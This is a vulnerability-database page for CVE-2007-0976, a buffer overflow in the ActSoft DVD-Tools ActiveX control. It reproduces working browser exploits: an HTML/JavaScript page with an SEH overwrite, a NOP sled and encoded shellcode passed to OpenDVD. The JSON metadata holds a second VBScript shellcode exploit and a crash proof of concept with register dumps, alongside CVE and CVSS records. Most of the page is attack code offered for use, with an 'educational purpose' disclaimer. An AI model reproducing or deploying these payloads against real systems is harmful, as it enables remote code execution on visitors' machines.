Search...

ActSoft DVD-Tools dvdtools.ocx Remote Buffer Overflow Exploit

2007-03-30T00:00:00

ID EDB-ID:3610
Type exploitdb
Reporter Umesh Wanve
Modified 2007-03-30T00:00:00

Description

ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit. CVE-2007-0976. Remote exploit for windows platform

                                        
                                            &lt;!--

  ===============================================================================================
                        ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow Exploit
                                            By Umesh Wanve 
  ==============================================================================================   
        
  Date : 30-03-2007
 
  Tested on Windows 2000 SP4 Server English
            Windows 2000 SP4 Professional English
 
   
  PS. This was written for educational purpose. Use it at your own risk.Author will be not be
      responsible for any damage.
 
  Always thanks to Metasploit and Stroke 

--&gt;



&lt;html&gt;

&lt;title&gt;
 ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow Exploit- By Umesh Wanve
&lt;/title&gt;

&lt;object classid='clsid:894A633E-F261-28BD-96F3-380EBEE1BADE' id='test' &gt;&lt;/object&gt;

&lt;script&gt;

var nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90");

var pointer_to_seh=unescape("%eb%06%90%90");

var seh_handler=unescape("%a9%11%02%75");


&lt;!-- win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com  --&gt;
var shellcode= 
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49")+
unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%64")+
unescape("%58%30%41%31%50%42%41%6b%41%41%74%32%41%42%41%32")+
unescape("%42%41%30%42%41%58%38%41%42%50%75%4a%49%6b%4c%79")+
unescape("%78%67%34%45%50%43%30%73%30%4c%4b%72%65%55%6c%4c")+
unescape("%4b%53%4c%53%35%70%78%54%41%7a%4f%6c%4b%72%6f%42")+
unescape("%38%6e%6b%51%4f%35%70%57%71%7a%4b%43%79%4c%4b%77")+
unescape("%44%4e%6b%74%41%48%6e%50%31%79%50%6d%49%6e%4c%6b")+
unescape("%34%6b%70%53%44%76%67%6a%61%4a%6a%44%4d%54%41%5a")+
unescape("%62%6a%4b%4b%44%37%4b%61%44%71%34%65%54%32%55%58")+
unescape("%65%6e%6b%63%6f%55%74%34%41%4a%4b%70%66%6e%6b%54")+
unescape("%4c%70%4b%6e%6b%73%6f%45%4c%76%61%78%6b%6c%4b%55")+
unescape("%4c%4c%4b%44%41%48%6b%4d%59%73%6c%57%54%75%54%6a")+
unescape("%63%54%71%4b%70%65%34%6c%4b%37%30%54%70%6c%45%4f")+
unescape("%30%73%48%54%4c%4e%6b%37%30%74%4c%4c%4b%50%70%67")+
unescape("%6c%4c%6d%4c%4b%62%48%45%58%38%6b%76%69%6e%6b%4f")+
unescape("%70%4e%50%45%50%47%70%37%70%6c%4b%32%48%47%4c%51")+
unescape("%4f%30%31%6b%46%43%50%61%46%6e%69%48%78%6d%53%4f")+
unescape("%30%61%6b%66%30%31%78%58%70%4d%5a%34%44%61%4f%55")+
unescape("%38%6e%78%6b%4e%6d%5a%34%4e%73%67%49%6f%6d%37%33")+
unescape("%53%31%71%70%6c%65%33%45%50%64");

var buff="";

for (i=0;i&lt;432;i++)    buff=buff+"A";


&lt;!--   Buffer ------      Short Jump to Shellcode   ----- Pop Pop ret ----  NOP SLED ---- Hellcode ---------&gt;

buff = buff         +           pointer_to_seh     +      seh_handler   +  nop+nop    +   shellcode    +nop+nop;


var attack = document.getElementById('test');

attack.OpenDVD(buff);


&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

# milw0rm.com [2007-03-30]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:3610", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ActSoft DVD-Tools dvdtools.ocx Remote Buffer Overflow Exploit", "description": "ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit. CVE-2007-0976. Remote exploit for windows platform", "published": "2007-03-30T00:00:00", "modified": "2007-03-30T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3610/", "reporter": "Umesh Wanve", "references": [], "cvelist": ["CVE-2007-0976"], "lastseen": "2016-01-31T18:54:26", "viewCount": 6, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2016-01-31T18:54:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0976"]}, {"type": "exploitdb", "idList": ["EDB-ID:3844", "EDB-ID:3307"]}, {"type": "osvdb", "idList": ["OSVDB:33732"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7251"]}], "modified": "2016-01-31T18:54:26", "rev": 2}, "vulnersScore": 8.3}, "sourceHref": "https://www.exploit-db.com/download/3610/", "sourceData": "\r\n\r\n\r\n\r\n<html>\r\n\r\n<title>\r\n ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow Exploit- By Umesh Wanve\r\n</title>\r\n\r\n<object classid='clsid:894A633E-F261-28BD-96F3-380EBEE1BADE' id='test' ></object>\r\n\r\n<script>\r\n\r\nvar nop=unescape(\"%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90\");\r\n\r\nvar pointer_to_seh=unescape(\"%eb%06%90%90\");\r\n\r\nvar seh_handler=unescape(\"%a9%11%02%75\");\r\n\r\n\r\n\r\nvar shellcode= \r\nunescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49\")+\r\nunescape(\"%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%64\")+\r\nunescape(\"%58%30%41%31%50%42%41%6b%41%41%74%32%41%42%41%32\")+\r\nunescape(\"%42%41%30%42%41%58%38%41%42%50%75%4a%49%6b%4c%79\")+\r\nunescape(\"%78%67%34%45%50%43%30%73%30%4c%4b%72%65%55%6c%4c\")+\r\nunescape(\"%4b%53%4c%53%35%70%78%54%41%7a%4f%6c%4b%72%6f%42\")+\r\nunescape(\"%38%6e%6b%51%4f%35%70%57%71%7a%4b%43%79%4c%4b%77\")+\r\nunescape(\"%44%4e%6b%74%41%48%6e%50%31%79%50%6d%49%6e%4c%6b\")+\r\nunescape(\"%34%6b%70%53%44%76%67%6a%61%4a%6a%44%4d%54%41%5a\")+\r\nunescape(\"%62%6a%4b%4b%44%37%4b%61%44%71%34%65%54%32%55%58\")+\r\nunescape(\"%65%6e%6b%63%6f%55%74%34%41%4a%4b%70%66%6e%6b%54\")+\r\nunescape(\"%4c%70%4b%6e%6b%73%6f%45%4c%76%61%78%6b%6c%4b%55\")+\r\nunescape(\"%4c%4c%4b%44%41%48%6b%4d%59%73%6c%57%54%75%54%6a\")+\r\nunescape(\"%63%54%71%4b%70%65%34%6c%4b%37%30%54%70%6c%45%4f\")+\r\nunescape(\"%30%73%48%54%4c%4e%6b%37%30%74%4c%4c%4b%50%70%67\")+\r\nunescape(\"%6c%4c%6d%4c%4b%62%48%45%58%38%6b%76%69%6e%6b%4f\")+\r\nunescape(\"%70%4e%50%45%50%47%70%37%70%6c%4b%32%48%47%4c%51\")+\r\nunescape(\"%4f%30%31%6b%46%43%50%61%46%6e%69%48%78%6d%53%4f\")+\r\nunescape(\"%30%61%6b%66%30%31%78%58%70%4d%5a%34%44%61%4f%55\")+\r\nunescape(\"%38%6e%78%6b%4e%6d%5a%34%4e%73%67%49%6f%6d%37%33\")+\r\nunescape(\"%53%31%71%70%6c%65%33%45%50%64\");\r\n\r\nvar buff=\"\";\r\n\r\nfor (i=0;i<432;i++) buff=buff+\"A\";\r\n\r\n\r\n\r\n\r\nbuff = buff + pointer_to_seh + seh_handler + nop+nop + shellcode +nop+nop;\r\n\r\n\r\nvar attack = document.getElementById('test');\r\n\r\nattack.OpenDVD(buff);\r\n\r\n\r\n</script>\r\n</body>\r\n</html>\r\n\r\n# milw0rm.com [2007-03-30]\r\n", "osvdbidlist": ["33732"]}

{"cve": [{"lastseen": "2020-10-03T11:45:49", "description": "Buffer overflow in the ActSoft DVD-Tools ActiveX control (dvdtools.ocx) allows remote attackers to execute arbitrary code via a long DVD_TOOLS.OpenDVD property value.", "edition": 3, "cvss3": {}, "published": "2007-02-16T01:28:00", "title": "CVE-2007-0976", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0976"], "modified": "2017-10-11T01:31:00", "cpe": ["cpe:/a:activex_soft:actsoft_dvd_tools:3.8.5"], "id": "CVE-2007-0976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0976", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:activex_soft:actsoft_dvd_tools:3.8.5:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0976"], "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 32529\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3307\n[CVE-2007-0976](https://vulners.com/cve/CVE-2007-0976)\nBugtraq ID: 22558\n", "edition": 1, "modified": "2007-02-14T03:18:15", "published": "2007-02-14T03:18:15", "href": "https://vulners.com/osvdb/OSVDB:33732", "id": "OSVDB:33732", "title": "DVD-Tools dvdtools.ocx ActiveX DVD_TOOLS.OpenDVD Property Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:26:16", "description": "ActSoft DVD-Tools (dvdtools.ocx 3.8.5.0) Stack Overflow Exploit. CVE-2007-0976. Remote exploit for windows platform", "published": "2007-05-04T00:00:00", "type": "exploitdb", "title": "ActSoft DVD-Tools dvdtools.ocx 3.8.5.0 Stack Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0976"], "modified": "2007-05-04T00:00:00", "id": "EDB-ID:3844", "href": "https://www.exploit-db.com/exploits/3844/", "sourceData": "<html>\r\n <object classid='clsid:894A633E-F261-28BD-96F3-380EBEE1BADE' id='test'></object>\r\n <script language = 'vbscript'>\r\n\r\n '----------------------------------------------------------------------------------\r\n ' ActSoft DVD-Tools (dvdtools.ocx v. 3.8.5.0) Stack Overflow Exploit (MoAxB bonus)\r\n ' url: http://www.activex-soft.com\r\n '\r\n ' original advisory: http://www.shinnai.altervista.org/viewtopic.php?id=41&t_id=30\r\n ' http://www.milw0rm.com/exploits/3307\r\n ' author: shinnai\r\n ' mail: shinnai[at]autistici[dot]org\r\n ' site: http://shinnai.altervista.org\r\n ' Tested on Windows XP Professional SP2 full patched, with Internet Explorer 7\r\n ' This exploit was written for working on Windows XP Professional SP2\r\n '----------------------------------------------------------------------------------\r\n\r\n buff = String(380,\"A\")\r\n\r\n get_EIP = unescape(\"%EB%AA%D7%77\")\r\n\r\n buff2 = String(92,\"A\")\r\n\r\n nop = unescape(\"%90%90%90%90%90%90%90%90%90%90\")\r\n\r\n shellcode = unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49\") & _\r\n unescape(\"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36\") & _\r\n unescape(\"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34\") & _\r\n unescape(\"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41\") & _\r\n unescape(\"%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54\") & _\r\n unescape(\"%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37\") & _\r\n unescape(\"%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48\") & _\r\n unescape(\"%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38\") & _\r\n unescape(\"%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c\") & _\r\n unescape(\"%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e\") & _\r\n unescape(\"%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48\") & _\r\n unescape(\"%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54\") & _\r\n unescape(\"%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38\") & _\r\n unescape(\"%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43\") & _\r\n unescape(\"%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37\") & _\r\n unescape(\"%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a\") & _\r\n unescape(\"%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b\") & _\r\n unescape(\"%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33\") & _\r\n unescape(\"%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57\") & _\r\n unescape(\"%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49\") & _\r\n unescape(\"%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36\") & _\r\n unescape(\"%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a\")\r\n\r\n egg = buff + get_EIP + buff2 + get_EIP + nop + shellcode + nop\r\n\r\n test.OpenDVD egg\r\n\r\n </script>\r\n</html>\r\n\r\n# milw0rm.com [2007-05-04]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3844/"}, {"lastseen": "2016-01-31T18:10:48", "description": "ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit PoC. CVE-2007-0976. Dos exploit for windows platform", "published": "2007-02-14T00:00:00", "type": "exploitdb", "title": "ActSoft DVD-Tools dvdtools.ocx Remote Buffer Overflow Exploit PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0976"], "modified": "2007-02-14T00:00:00", "id": "EDB-ID:3307", "href": "https://www.exploit-db.com/exploits/3307/", "sourceData": "<html>\r\n\r\n-------------------------------------------------------------------------------------------------\r\n ActSoft DVD-Tools (dvdtools.ocx) Buffer Overflow\r\n developer's url: <a href=http://www.activex-soft.com/>http://www.activex-soft.com</a>\r\n author: shinnai\r\n mail: shinnai[at]autistici[dot]org\r\n site: <a href=http://shinnai.altervista.org>http://shinnai.altervista.org</a>\r\n Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7\r\n This product is selled under 1 Developer License for $129 and under Site Wide License for $499 :)\r\n Using only 400 characters will cause just a crash of IE7 (or of the software that use this\r\n activex), encreasing the number of characters EIP will be overwrite and arbitrary code execution\r\n will be possible.\r\n -------------------------------------------------------------------------------------------------\r\n \r\n <object classid='clsid:894A633E-F261-28BD-96F3-380EBEE1BADE' id='DVD_TOOLS' ></object>\r\n <input type=\"button\" value=\"Click here to start the test\" language=\"VBScript\" OnClick=\"VBButtonClicked()\">\r\n\r\n<script language=\"VBScript\">\r\n\r\nsub VBButtonClicked()\r\n\tActiveX_File = \"C:\\Programmi\\ActiveX Soft\\ActSoft DVD-Tools\\dvdtools.ocx\"\r\n\tMethod = \"OpenDVD\"\r\n\tVariable_Declaration = \"Sub OpenDVD ( ByVal path As String )\"\r\n\r\n\tArgCount = 1\r\n\r\n\tArg1=String(2500,\"A\")\r\n\r\n\tDVD_TOOLS.OpenDVD Arg1\r\n\r\nEnd Sub\r\n\r\n</script>\r\n \r\n This is a dump of registers\r\n 12:18:20.295 pid=0D6C tid=0AD0 EXCEPTION (first-chance)\r\n ----------------------------------------------------------------\r\n Exception C0000005 (ACCESS_VIOLATION reading [414145C5])\r\n ----------------------------------------------------------------\r\n EAX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EBX=0174F414: 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41\r\n ECX=000097F9: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EDX=0174FC0C: 6F 00 00 00 00 00 00 00-60 60 1C 03 01 00 74 01\r\n ESP=0174F080: 50 F1 74 01 68 3A 14 00-6B 1F 94 7C 41 1C 94 7C\r\n EBP=0174F3F8: 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41\r\n ESI=00000008: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EDI=031AD432: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00\r\n EIP=047A184D: 8B 90 84 04 00 00 8D 88-7C 04 00 00 85 D2 7E 09\r\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0--> N/A\r\n ----------------------------------------------------------------\r\n \r\n 12:18:20.311 pid=0D6C tid=0AD0 EXCEPTION (first-chance)\r\n ----------------------------------------------------------------\r\n Exception C0000005 (ACCESS_VIOLATION reading [41414141])\r\n ----------------------------------------------------------------\r\n EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00\r\n ESP=0174ECB0: BF 37 91 7C 98 ED 74 01-EC F3 74 01 B4 ED 74 01\r\n EBP=0174ECD0: 80 ED 74 01 8B 37 91 7C-98 ED 74 01 EC F3 74 01\r\n ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0--> N/A\r\n ----------------------------------------------------------------\r\n \r\n 12:18:20.311 pid=0D6C tid=0AD0 EXCEPTION (first-chance)\r\n ----------------------------------------------------------------\r\n Exception C0000005 (ACCESS_VIOLATION reading [41414141])\r\n ----------------------------------------------------------------\r\n EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00\r\n ESP=0174E8E0: BF 37 91 7C C8 E9 74 01-EC F3 74 01 E4 E9 74 01\r\n EBP=0174E900: B0 E9 74 01 8B 37 91 7C-C8 E9 74 01 EC F3 74 01\r\n ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??\r\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0--> N/A\r\n ----------------------------------------------------------------\r\n To be continued...\r\n\r\n# milw0rm.com [2007-02-14]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3307/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-0976"], "description": "Stack buffer overrun in OpenDVD method within dvdtools.ocx ActiveX class library.", "edition": 1, "modified": "2007-04-01T00:00:00", "published": "2007-04-01T00:00:00", "id": "SECURITYVULNS:VULN:7251", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7251", "title": "ActSoft DVD-Tools ActiveX buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}